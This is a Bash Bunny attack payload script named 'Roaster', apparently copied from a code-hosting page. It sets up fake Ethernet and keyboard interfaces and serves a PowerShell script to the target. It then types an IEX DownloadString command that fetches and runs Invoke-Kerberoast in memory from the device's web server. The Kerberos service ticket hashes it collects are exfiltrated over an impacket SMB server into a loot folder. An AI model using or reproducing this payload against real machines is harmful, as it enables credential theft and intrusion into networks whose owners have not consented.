67 lines
1.4 KiB
Bash
67 lines
1.4 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: Roaster
|
|
# Author: golem445
|
|
# Version: 1.0
|
|
# Attack Modes: RNDIS_ETHERNET, HID
|
|
# Dependencies: impacket, gohttp
|
|
# Runtime: ~10 seconds
|
|
# Description:
|
|
# Sets up Ethernet and HID keyboard interfaces simultaneously,
|
|
# then uses HID to import Invoke-Kerberoast into memory via
|
|
# Bash Bunny web server and execute the attack. Results are
|
|
# exported to the loot directory via SMB.
|
|
#
|
|
# LEDS:
|
|
# Magenta: Setup
|
|
# Yellow Blink: Attacking
|
|
# White Blink: Clean up
|
|
# Green: Attack Finished
|
|
|
|
### Prep for attack ###
|
|
LED SETUP
|
|
REQUIRETOOL impacket gohttp
|
|
GET SWITCH_POSITION
|
|
|
|
# Temporary loot directory
|
|
mkdir -p /loot/smb/
|
|
|
|
# Permanent loot directory
|
|
mkdir -p /root/udisk/loot/roaster_exfil/
|
|
|
|
# Set interfaces
|
|
ATTACKMODE RNDIS_ETHERNET HID
|
|
|
|
# Start web server
|
|
cd /root/udisk/payloads/$SWITCH_POSITION
|
|
gohttp -p 80 &
|
|
|
|
# Start SMB Server
|
|
python /tools/impacket/examples/smbserver.py s /loot/smb &
|
|
|
|
### Start attack ###
|
|
LED ATTACK
|
|
RUN WIN powershell "IEX (New-object Net.Webclient).DownloadString('http://172.16.64.1/s.ps1')"
|
|
|
|
# Wait until files are done copying.
|
|
LED STAGE2
|
|
while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done
|
|
|
|
### Cleanup ###
|
|
LED CLEANUP
|
|
|
|
# Delete Exfil file
|
|
rm /loot/smb/EXFILTRATION_COMPLETE
|
|
|
|
# Move Kerberos SPNS to permanent loot directory
|
|
mv /loot/smb/* /root/udisk/loot/roaster_exfil/
|
|
|
|
# Clean up temporary loot directory
|
|
rm -rf /loot/smb/*
|
|
|
|
# Sync file system
|
|
sync
|
|
|
|
# Complete
|
|
LED FINISH
|